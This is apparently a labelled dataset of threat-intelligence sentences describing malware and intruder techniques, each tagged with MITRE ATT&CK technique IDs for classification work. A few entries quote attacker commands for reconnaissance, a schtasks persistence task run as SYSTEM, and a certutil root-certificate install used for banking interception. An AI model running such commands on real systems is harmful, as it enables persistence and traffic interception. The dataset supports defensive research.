{"text1":"abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.","labels":"['T1574.001']"}
{"text1":"accessed email accounts using Outlook Web Access.","labels":"['T1114']"}
{"text1":"accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a  to execute the malware.","labels":"['T1021.002']"}
{"text1":"accesses the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.","labels":"['T1012']"}
{"text1":"achieves persistence by adding a shortcut of itself to the startup path in the Registry.","labels":"['T1547.001']"}
{"text1":"achieves persistence by adding itself to the HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key.","labels":"['T1547.001']"}
{"text1":"achieves persistence by creating a Registry entry in HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.","labels":"['T1547.001']"}
{"text1":"achieves persistence by creating a shortcut in the current user's Startup folder.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"achieves persistence by making an entry in the Registry's Run key.","labels":"['T1547.001']"}
{"text1":"achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","labels":"['T1547.001']"}
{"text1":"actors have been known to copy files to the network shares of other computers to move laterally.","labels":"['T1021.002']"}
{"text1":"actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.","labels":"['T1546.008']"}
{"text1":"actors have split RAR files for exfiltration into parts.","labels":"['T1030']"}
{"text1":"actors have used  and a modified version of  called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.","labels":"['T1003']"}
{"text1":"actors have used DLL side-loading. Actors have used legitimate Kaspersky anti-virus variants in which the DLL acts as a stub loader that loads and executes the shell code.","labels":"['T1574.002']"}
{"text1":"actors leverage legitimate credentials to log into external remote services.","labels":"['T1078', 'T1133']"}
{"text1":"actors obtained a list of active processes on the victim and sent them to C2 servers.","labels":"['T1057']"}
{"text1":"actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.","labels":"['T1078']"}
{"text1":"actors spawned shells on remote systems on a victim network to execute commands.","labels":"['T1059']"}
{"text1":"actors used compromised credentials for the victim's endpoint management platform, Altiris, to move laterally.","labels":"['T1078']"}
{"text1":"actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.","labels":"['T1078']"}
{"text1":"actors used the following command following exploitation of a machine with  malware to display network connections: netstat -ano >> %temp%\\download","labels":"['T1049']"}
{"text1":"actors used the following command following exploitation of a machine with  malware to obtain information about services: net start >> %temp%\\download","labels":"['T1007']"}
{"text1":"actors used the following commands after exploiting a machine with  malware to obtain information about files and directories: dir c:\\ >> %temp%\\download dir \"c:\\Documents and Settings\" >> %temp%\\download dir \"c:\\Program Files\\\" >> %temp%\\download dir d:\\ >> %temp%\\download","labels":"['T1083']"}
{"text1":"actors used the following commands following exploitation of a machine with  malware to enumerate user accounts: net user >> %temp%\\download net user \/domain >> %temp%\\download","labels":"['T1087']"}
{"text1":"actors used the following command to rename one of their tools to a benign file name: ren \"%temp%\\upload\" audiodg.exe","labels":"['T1036']"}
{"text1":"actors used the native  Windows task scheduler tool to use scheduled tasks for execution on a victim network.","labels":"['T1053.005']"}
{"text1":"actors use nbtscan to discover vulnerable systems.","labels":"['T1016']"}
{"text1":"actors use the Hunter tool to conduct network service discovery for vulnerable systems.","labels":"['T1046']"}
{"text1":"actors use  to schedule tasks to run self-extracting RAR archives, which install  or  on other victims on a network.","labels":"['T1053.005']"}
{"text1":"added \"junk data\" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a \"junk length\" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.","labels":"['T1001']"}
{"text1":"added junk data to outgoing UDP packets to peer implants.","labels":"['T1001']"}
{"text1":"added newly created accounts to the administrators group to maintain elevated access.","labels":"['T1098']"}
{"text1":"added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"adds a .lnk file to the Windows startup folder.","labels":"['T1547.009']"}
{"text1":"adds a .plist file to the \/Library\/LaunchAgents folder to maintain persistence.","labels":"['T1543.001']"}
{"text1":"adds an entry to the rc.common file for persistence.","labels":"['T1037.004']"}
{"text1":"adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036']"}
{"text1":"adds a new service named NetAdapter to establish persistence.","labels":"['T1543.003']"}
{"text1":"adds a Registry Run key for ctfmon.exe to establish persistence.","labels":"['T1547.001']"}
{"text1":"adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.","labels":"['T1547.001']"}
{"text1":"adds a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"adds Registry Run keys to achieve persistence.","labels":"['T1547.001']"}
{"text1":"A Destover-like implant used by  can obtain the current system time and send it to the C2 server.","labels":"['T1124']"}
{"text1":"A Destover-like variant used by  uses a batch file mechanism to delete its binaries from the system.","labels":"['T1064']"}
{"text1":"A dropper used by  installs itself into the ASEP Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with a value named McUpdate.","labels":"['T1547.001']"}
{"text1":"Adversaries can instruct  to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.","labels":"['T1053.005', 'T1021.002', 'T1078']"}
{"text1":"A  file stealer can communicate over HTTP for C2.","labels":"['T1071']"}
{"text1":"A  file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.","labels":"['T1082']"}
{"text1":"A  file stealer can gather the victim's username to send to a C2 server.","labels":"['T1033']"}
{"text1":"A  file stealer can run a TaskScheduler DLL to add persistence.","labels":"['T1053.005']"}
{"text1":"A  file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.","labels":"['T1025']"}
{"text1":"A  file stealer transfers collected files to a hardcoded C2 server.","labels":"['T1041']"}
{"text1":"After collecting files and logs from the victim,  encrypts some collected data with Blowfish.","labels":"['T1486']"}
{"text1":"After compromising a victim,  lists all running processes.","labels":"['T1057']"}
{"text1":"After copying itself to a DLL file, a variant of  calls the DLL file using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"After decrypting itself in memory,  downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This \u201cdownloaded\u201d file is actually not dropped onto the system.","labels":"['T1055']"}
{"text1":"After downloading its main config file,  downloads multiple payloads from C2 servers.","labels":"['T1105']"}
{"text1":"After encrypting C2 data,  converts it into a hexadecimal representation and then encodes it into base64.","labels":"['T1001']"}
{"text1":"After encrypting log files, the log encryption module in  deletes the original, unencrypted files from the host.","labels":"['T1070']"}
{"text1":"After initial compromise,  will download a second stage to establish a more permanent presence on the affected system.","labels":"['T1104']"}
{"text1":"After using raw sockets to communicate with its C2 server,  uses a decrypted string to create HTTP POST requests.","labels":"['T1071']"}
{"text1":"aggregates collected data in a tmp file.","labels":"['T1074']"}
{"text1":"A  implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.","labels":"['T1036']"}
{"text1":"A  Javascript backdoor added a local_update_check value under the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence. Additionally, a  custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","labels":"['T1547.001']"}
{"text1":"A  JavaScript backdoor has used Google Apps Script as its C2 server.","labels":"['T1102']"}
{"text1":"A keylogging tool used by  gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.","labels":"['T1016']"}
{"text1":"A Linux version of  checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges.  also gathers the username of the victim.","labels":"['T1033']"}
{"text1":"allows actors to spawn a reverse shell on a victim.","labels":"['T1059']"}
{"text1":"allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.","labels":"['T1083']"}
{"text1":"allows adversaries to execute shell commands on the infected host.","labels":"['T1059']"}
{"text1":"allows adversaries to modify the way the \"beacon\" payload communicates. This is called \"Malleable C2\" in the  manual and is intended to allow a penetration test team to mimic known APT C2 methods.","labels":"['T1095']"}
{"text1":"allows adversaries to search for files.","labels":"['T1083']"}
{"text1":"A  macro deletes files after it has decoded and decompressed them.","labels":"['T1070.004']"}
{"text1":"A  malware sample adds persistence on the system by creating a shortcut in the user\u2019s Startup folder.","labels":"['T1547.009']"}
{"text1":"A  malware sample encodes data with base64.","labels":"['T1132']"}
{"text1":"A  malware sample performs reflective DLL injection.","labels":"['T1055']"}
{"text1":"A  module has a default C2 port of 13000.","labels":"['T1571']"}
{"text1":"A module in  collects information from the victim about installed anti-virus software.","labels":"['T1518.001']"}
{"text1":"A module in  collects information from the victim about its IP addresses and MAC addresses.","labels":"['T1016']"}
{"text1":"A module in  collects information from the victim about the current user name.","labels":"['T1033']"}
{"text1":"A module in  collects information from the victim about Windows OS version, computer name, battery info, and physical memory.","labels":"['T1082']"}
{"text1":"A module in  collects information on available printers and disk drives.","labels":"['T1120']"}
{"text1":"An  backdoor may collect the entire contents of an inserted USB device.","labels":"['T1025']"}
{"text1":"An  downloader creates persistence by creating the following scheduled task: schtasks \/create \/tn \"mysc\" \/tr C:\\Users\\Public\\test.exe \/sc ONLOGON \/ru \"System\".","labels":"['T1053.005']"}
{"text1":"An  downloader establishes SOCKS5 connections for its initial C2.","labels":"['T1090', 'T1095']"}
{"text1":"An  downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.","labels":"['T1104']"}
{"text1":"An  downloader uses the Windows command \"cmd.exe\" \/C whoami. The group also uses a tool to execute commands on remote computers.","labels":"['T1059']"}
{"text1":"An  downloader uses the Windows command \"cmd.exe\" \/C whoami to verify that it is running with the elevated privileges of \u201cSystem.\u201d","labels":"['T1033']"}
{"text1":"An executable dropped onto victims by  aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).","labels":"['T1055']"}
{"text1":"An  HTTP malware variant decrypts strings using single-byte XOR keys.","labels":"['T1140']"}
{"text1":"An  HTTP malware variant establishes persistence by setting the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\.","labels":"['T1547.001']"}
{"text1":"An  HTTP malware variant used Base64 to encode communications to the C2 server.","labels":"['T1132']"}
{"text1":"An  loader Trojan adds the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.","labels":"['T1037']"}
{"text1":"An  loader Trojan uses a batch script to run its payload.","labels":"['T1064']"}
{"text1":"An  loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.","labels":"['T1057']"}
{"text1":"An older variant of  performs UAC bypass.","labels":"['T1548.002']"}
{"text1":"An older version of  has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.","labels":"['T1083']"}
{"text1":"An  Port 22 malware variant registers itself as a service.","labels":"['T1543.003']"}
{"text1":"A  payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.","labels":"['T1112']"}
{"text1":"A  payload has searched all fixed drives on the victim for files matching a specified list of extensions.","labels":"['T1083']"}
{"text1":"A  payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.","labels":"['T1055.012']"}
{"text1":"A  payload was packed with UPX.","labels":"['T1027.002']"}
{"text1":"APIs and strings in some  variants are RC4 encrypted. Another variant is encoded with XOR.","labels":"['T1027']"}
{"text1":"apparently altered  samples by adding four bytes of random letters in a likely attempt to change the file hashes.","labels":"['T1027.001', 'T1027.005']"}
{"text1":"appears to have functionality to modify remote Registry information.","labels":"['T1112']"}
{"text1":"appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.","labels":"['T1027']"}
{"text1":"appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.","labels":"['T1027.001']"}
{"text1":"As part of the data reconnaissance phase,  grabs the system time to send back to the control server.","labels":"['T1124']"}
{"text1":"A system info module in  gathers information on the victim host\u2019s configuration.","labels":"['T1082']"}
{"text1":"A  tool can create a new service, naming it after the config information, to gain persistence.","labels":"['T1543.003']"}
{"text1":"A  tool can encrypt payloads using XOR.  malware is also obfuscated using Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1027']"}
{"text1":"A  tool can read and decrypt stored Registry values.","labels":"['T1012']"}
{"text1":"A  tool can spawn svchost.exe and inject the payload into that process.","labels":"['T1055']"}
{"text1":"A  tool can use a public UAC bypass method to elevate privileges.","labels":"['T1548.002']"}
{"text1":"A  tool can use WMI to execute a binary.","labels":"['T1047']"}
{"text1":"attempted to contact the C2 server over TCP using port 80.","labels":"['T1043']"}
{"text1":"attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.","labels":"['T1204']"}
{"text1":"attempted to get users to click on Microsoft Excel attachments containing malicious macro scripts.","labels":"['T1204']"}
{"text1":"attempted to get users to launch malicious attachments delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.","labels":"['T1598.003']"}
{"text1":"attempted to use RDP to move laterally.","labels":"['T1021.001']"}
{"text1":"attempts to access the ADMIN$, C$\\Windows, D$\\Windows, and E$\\Windows shares on the victim with its current privileges.","labels":"['T1083']"}
{"text1":"attempts to add a shortcut file in the Startup folder to achieve persistence.","labels":"['T1547.009']"}
{"text1":"attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","labels":"['T1547.001']"}
{"text1":"attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.","labels":"['T1104']"}
{"text1":"attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.","labels":"['T1548.002']"}
{"text1":"attempts to detect several anti-virus products.","labels":"['T1518.001']"}
{"text1":"attempts to disable UAC remote restrictions by modifying the Registry.","labels":"['T1548.002']"}
{"text1":"attempts to download an encrypted binary from a specified domain.","labels":"['T1105']"}
{"text1":"attempts to escalate privileges by bypassing User Access Control.","labels":"['T1548.002']"}
{"text1":"attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.","labels":"['T1068']"}
{"text1":"attempts to hide its payloads using legitimate filenames.","labels":"['T1036']"}
{"text1":"attempts to obtain legitimate credentials during operations.","labels":"['T1078']"}
{"text1":"attempts to overwrite operating system files with image files.","labels":"['T1070.004']"}
{"text1":"A  uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.","labels":"['T1027']"}
{"text1":"automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.","labels":"['T1119']"}
{"text1":"automatically searches for files on local drives based on a predefined list of file extensions.","labels":"['T1083']"}
{"text1":"automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes.  also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.","labels":"['T1020']"}
{"text1":"A  variant can force the compromised system to function as a proxy server.","labels":"['T1090']"}
{"text1":"A  variant downloads the backdoor payload via the BITS service.","labels":"['T1197']"}
{"text1":"A  variant encodes C2 POST data base64.","labels":"['T1132']"}
{"text1":"A  variant has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"A  variant has used rundll32 for execution.","labels":"['T1218.011']"}
{"text1":"A  variant is encoded using a simple XOR cipher.","labels":"['T1027']"}
{"text1":"A variant of  attempts communication to the C2 server over HTTP on port 443.","labels":"['T1043']"}
{"text1":"A variant of  encrypts some C2 with 3DES and RSA.","labels":"['T1573']"}
{"text1":"A variant of  executes dir C:\\progra~1 when initially run.","labels":"['T1083']"}
{"text1":"A  variant uses a C2 mechanism similar to port knocking that allows attackers to connect to a victim without leaving the connection open for more than a few sectonds.","labels":"['T1095']"}
{"text1":"A  variant uses DLL search order hijacking.","labels":"['T1574.001']"}
{"text1":"A  variant uses fake TLS to communicate with the C2 server.","labels":"['T1095']"}
{"text1":"A  VBA Macro sets its file attributes to System and Hidden.","labels":"['T1564.001']"}
{"text1":"A  VBScript receives a batch script to execute a set of commands in a command prompt.","labels":"['T1119']"}
{"text1":"A version of  introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.","labels":"['T1027.001']"}
{"text1":"A version of  loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.","labels":"['T1127']"}
{"text1":"avoids analysis by encrypting all strings, internal files, configuration data.","labels":"['T1027']"}
{"text1":"A Word document delivering  prompts the user to enable macro execution.","labels":"['T1204']"}
{"text1":"Based on comparison of  versions,  made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.","labels":"['T1027.005']"}
{"text1":"beacons to destination port 443.","labels":"['T1043']"}
{"text1":"Before being appended to image files,  commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.","labels":"['T1573']"}
{"text1":"Before writing to disk,  inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.","labels":"['T1027.001']"}
{"text1":"binds and listens on port 1058.","labels":"['T1571']"}
{"text1":"binds and listens on port 443.","labels":"['T1043']"}
{"text1":"bypassed User Access Control (UAC).","labels":"['T1548.002']"}
{"text1":"bypasses UAC to escalate privileges by using a custom \u201cRedirectEXE\u201d shim database.","labels":"['T1548.002']"}
{"text1":"bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).","labels":"['T1548.002']"}
{"text1":"C2 messages are Base64-encoded.","labels":"['T1132']"}
{"text1":"C2 servers communicated with malware over TCP 8081, 8282, and 8083.","labels":"['T1571']"}
{"text1":"C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers.","labels":"['T1001']"}
{"text1":"C2 traffic can communicate via TCP raw sockets.","labels":"['T1095']"}
{"text1":"C2 traffic for most  tools occurs over Port Numbers 53, 80, and 443.","labels":"['T1043']"}
{"text1":"C2 traffic from  is encrypted, then encoded with Base64 encoding.","labels":"['T1132']"}
{"text1":"C2 traffic has been encrypted with RC4 and AES.","labels":"['T1573']"}
{"text1":"C2 traffic is base64-encoded.","labels":"['T1132']"}
{"text1":"C2 traffic is encrypted using bitwise NOT and XOR operations.","labels":"['T1573']"}
{"text1":"calls cmd.exe to run various DLL files via rundll32.","labels":"['T1218.011']"}
{"text1":"calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup.  also has the capability to invoke a reverse shell.","labels":"['T1059']"}
{"text1":"can accept multiple URLs for C2 servers.","labels":"['T1008']"}
{"text1":"can add a new service to ensure  persists on the system when delivered as another payload onto the system.","labels":"['T1543.003']"}
{"text1":"can add or remove applications or ports on the Windows firewall or disable it entirely.","labels":"['T1562.001']"}
{"text1":"can alter the victim's proxy configuration.","labels":"['T1562.001']"}
{"text1":"can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","labels":"['T1548.002']"}
{"text1":"can be added as a service to establish persistence.","labels":"['T1543.003']"}
{"text1":"can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.","labels":"['T1090']"}
{"text1":"can be configured to use HTTP or DNS for command and control.","labels":"['T1071']"}
{"text1":"can be configured to use multiple network protocols to avoid network-based detection.","labels":"['T1026']"}
{"text1":"can be configured to use raw TCP or UDP for command and control.","labels":"['T1095']"}
{"text1":"can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.","labels":"['T1574.001']"}
{"text1":"can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.","labels":"['T1546.007']"}
{"text1":"can be used to copy files to a remotely connected system.","labels":"['T1105']"}
{"text1":"can be used to create  to upload and\/or download files.","labels":"['T1105']"}
{"text1":"can be used to create  to upload files from a compromised host.","labels":"['T1048']"}
{"text1":"can be used to delete files from the file system.","labels":"['T1070.004']"}
{"text1":"can be used to disable local firewall settings.","labels":"['T1562.001']"}
{"text1":"can be used to discover current NetBIOS sessions.","labels":"['T1049']"}
{"text1":"can be used to discover local NetBIOS domain names.","labels":"['T1016']"}
{"text1":"can be used to discover processes running on a system.","labels":"['T1057']"}
{"text1":"can be used to discover services running on a system.","labels":"['T1007']"}
{"text1":"can be used to discover system firewall settings.","labels":"['T1518.001']"}
{"text1":"can be used to display ARP configuration information on the host.","labels":"['T1016']"}
{"text1":"can be used to download files from a given URL.","labels":"['T1105']"}
{"text1":"can be used to dump credentials.","labels":"['T1003']"}
{"text1":"can be used to enumerate local network connections, including active TCP connections and other network statistics.","labels":"['T1049']"}
{"text1":"can be used to enumerate security software currently running on a system by process name of known products.","labels":"['T1518.001']"}
{"text1":"can be used to execute binaries on remote systems by creating and starting a service.","labels":"['T1569.002']"}
{"text1":"can be used to find files and directories with native functionality such as dir commands.","labels":"['T1083']"}
{"text1":"can be used to find information about the operating system.","labels":"['T1082']"}
{"text1":"can be used to gather information about the operating system.","labels":"['T1082']"}
{"text1":"can be used to identify remote systems within a network.","labels":"['T1018']"}
{"text1":"can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\\cert512121.der.","labels":"['T1553.004']"}
{"text1":"can be used to locate certain types of files\/directories in a system.(ex: locate all files with a specific extension, name, and\/or age)","labels":"['T1083']"}
{"text1":"can be used to schedule a task on a system.","labels":"['T1053.005']"}
{"text1":"can be used to set up a proxy tunnel to allow remote host access to an infected host.","labels":"['T1090']"}
{"text1":"can be used to subvert controls and possibly conceal command execution by not directly invoking .","labels":"['T1202']"}
{"text1":"can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","labels":"['T1548.002']"}
{"text1":"can capture a screenshot from a victim.","labels":"['T1113']"}
{"text1":"can capture desktop screenshots in the PNG format and send them to the C2 server.","labels":"['T1113']"}
{"text1":"can capture screenshots.","labels":"['T1113']"}
{"text1":"can capture screenshots at a configurable interval.","labels":"['T1113']"}
{"text1":"can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.","labels":"['T1113']"}
{"text1":"can capture screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"can capture the victim's screen.","labels":"['T1113']"}
{"text1":"can change Internet Explorer settings to reduce warnings about malware activity.","labels":"['T1562.001']"}
{"text1":"can collect CPU and architecture information from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"can collect data from a local system.","labels":"['T1005']"}
{"text1":"can collect data from user directories.","labels":"['T1005']"}
{"text1":"can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.","labels":"['T1082']"}
{"text1":"can communicate over a reverse proxy using SOCKS5.","labels":"['T1090']"}
{"text1":"can communicate over FTP and send email over SMTP.","labels":"['T1071']"}
{"text1":"can communicate over HTTP, SMTP, and POP3 for C2.","labels":"['T1071']"}
{"text1":"can communicate over HTTP for C2.","labels":"['T1071']"}
{"text1":"can communicate to its C2 over HTTP and HTTPS if directed.","labels":"['T1071']"}
{"text1":"can communicate to its C2 over TCP using a custom binary protocol.","labels":"['T1095']"}
{"text1":"can communicate using SOCKS.","labels":"['T1095']"}
{"text1":"can compress data with Zip before sending it over C2.","labels":"['T1560']"}
{"text1":"can conduct file browsing.","labels":"['T1083']"}
{"text1":"can create a directory (C:\\ProgramData\\Mail\\MailAg\\gl) to use as a temporary directory for uploading files.","labels":"['T1074']"}
{"text1":"can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.","labels":"['T1036']"}
{"text1":"can create a new service named msamger (Microsoft Security Accounts Manager).","labels":"['T1543.003']"}
{"text1":"can create a remote shell and run a given command.","labels":"['T1059']"}
{"text1":"can create a shortcut in the Windows startup folder for persistence.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"can create backdoor accounts with the login \"HelpAssistant\" with the Limbo module.","labels":"['T1136']"}
{"text1":"can delete all Registry entries created during its execution.","labels":"['T1112']"}
{"text1":"can delete a specified file.","labels":"['T1070.004']"}
{"text1":"can delete files and directories.","labels":"['T1070.004']"}
{"text1":"can delete files and itself after infection to avoid analysis.","labels":"['T1070.004']"}
{"text1":"can delete files and optionally overwrite with random data beforehand.","labels":"['T1070.004']"}
{"text1":"can delete files off the system.","labels":"['T1070.004']"}
{"text1":"can delete files on the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"can delete files written to disk.","labels":"['T1070.004']"}
{"text1":"can delete itself or specified files.","labels":"['T1070.004']"}
{"text1":"can delete malware and associated artifacts from the victim.","labels":"['T1070.004']"}
{"text1":"can delete services from the victim\u2019s machine.","labels":"['T1543.003']"}
{"text1":"can delete specified files.","labels":"['T1070.004']"}
{"text1":"can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
{"text1":"can disable Avira anti-virus.","labels":"['T1562.001']"}
{"text1":"can disable Microsoft Office Protected View by changing Registry keys.","labels":"['T1562.001']"}
{"text1":"can discover and collect victim system information.","labels":"['T1082']"}
{"text1":"can download additional encrypted backdoors onto the victim via GIF files.","labels":"['T1105']"}
{"text1":"can download additional files.","labels":"['T1105']"}
{"text1":"can download additional files and payloads to compromised hosts.","labels":"['T1105']"}
{"text1":"can download additional files from URLs.","labels":"['T1105']"}
{"text1":"can download additional payloads onto the victim.","labels":"['T1105']"}
{"text1":"can download and execute additional files.","labels":"['T1105']"}
{"text1":"can download and execute an arbitary executable.","labels":"['T1105']"}
{"text1":"can download and execute files.","labels":"['T1105']"}
{"text1":"can download and launch additional payloads.","labels":"['T1105']"}
{"text1":"can download and upload files to and from the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"can download and upload files to the victim's machine.","labels":"['T1105']"}
{"text1":"can download an executable to run on the victim.","labels":"['T1105']"}
{"text1":"can download files from its C2 server to the victim's machine.","labels":"['T1105']"}
{"text1":"can download files from remote servers.","labels":"['T1105']"}
{"text1":"can download files from the C2 server to the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"can download files off the target system to send back to the server.","labels":"['T1005']"}
{"text1":"can download files onto the victim.","labels":"['T1105']"}
{"text1":"can download files remotely.","labels":"['T1105']"}
{"text1":"can download or upload files from its C2 server.","labels":"['T1105']"}
{"text1":"can download remote files.","labels":"['T1105']"}
{"text1":"can download remote files and additional payloads to the victim's machine.","labels":"['T1105']"}
{"text1":"can download remote files onto victims.","labels":"['T1105']"}
{"text1":"can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.","labels":"['T1113']"}
{"text1":"can dump credentials.","labels":"['T1003']"}
{"text1":"can dump passwords and save them into \\ProgramData\\Mail\\MailAg\\pwds.txt.","labels":"['T1003']"}
{"text1":"can dump the SAM database.","labels":"['T1003']"}
{"text1":"can enable\/disable RDP connection and can start a remote desktop session using a browser web socket client.","labels":"['T1021.001']"}
{"text1":"can enable remote desktop on the victim's machine.","labels":"['T1021.001']"}
{"text1":"can encrypt C2 traffic with AES.","labels":"['T1573']"}
{"text1":"can enumerate active windows.","labels":"['T1010']"}
{"text1":"can enumerate and search for files and directories.","labels":"['T1083']"}
{"text1":"can enumerate drives and Remote Desktop sessions.","labels":"['T1049']"}
{"text1":"can enumerate drives and their types. It can also change file permissions using cacls.exe.","labels":"['T1083']"}
{"text1":"can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.","labels":"['T1033']"}
{"text1":"can enumerate processes.","labels":"['T1057']"}
{"text1":"can enumerate Registry keys.","labels":"['T1012']"}
{"text1":"can enumerate Registry values, keys, and data.","labels":"['T1012']"}
{"text1":"can establish persistence by adding a Scheduled Task named \"Microsoft Boost Kernel Optimization\".","labels":"['T1053.005']"}
{"text1":"can establish persistence by adding Registry Run keys.","labels":"['T1547.001']"}
{"text1":"can establish persistence by creating a .lnk file in the Start menu.","labels":"['T1547.001']"}
{"text1":"can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.","labels":"['T1547.009']"}
{"text1":"can establish persistence by creating a scheduled task.","labels":"['T1053.005']"}
{"text1":"can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.","labels":"['T1547.004']"}
{"text1":"can establish persistence through the system screensaver by configuring it to execute the malware.","labels":"['T1546.002']"}
{"text1":"can establish using a AppCertDLLs Registry key.","labels":"['T1546.009']"}
{"text1":"can establish using a Registry run key.","labels":"['T1547.001']"}
{"text1":"can execute a payload on a remote host with PowerShell. This technique does write any data to disk.","labels":"['T1059.001']"}
{"text1":"can execute a task to download a file.","labels":"['T1105']"}
{"text1":"can execute commands from its C2 server.","labels":"['T1059']"}
{"text1":"can execute commands on the victim.","labels":"['T1059']"}
{"text1":"can execute commands on the victim's machine.","labels":"['T1059']"}
{"text1":"can execute commands on victims.","labels":"['T1059']"}
{"text1":"can execute commands remotely by creating a new schedule task on the remote system","labels":"['T1053.005']"}
{"text1":"can execute commands remotely by creating a new service on the remote system.","labels":"['T1569.002']"}
{"text1":"can execute commands using a shell.","labels":"['T1059']"}
{"text1":"can execute commands using cmd.exe.","labels":"['T1059']"}
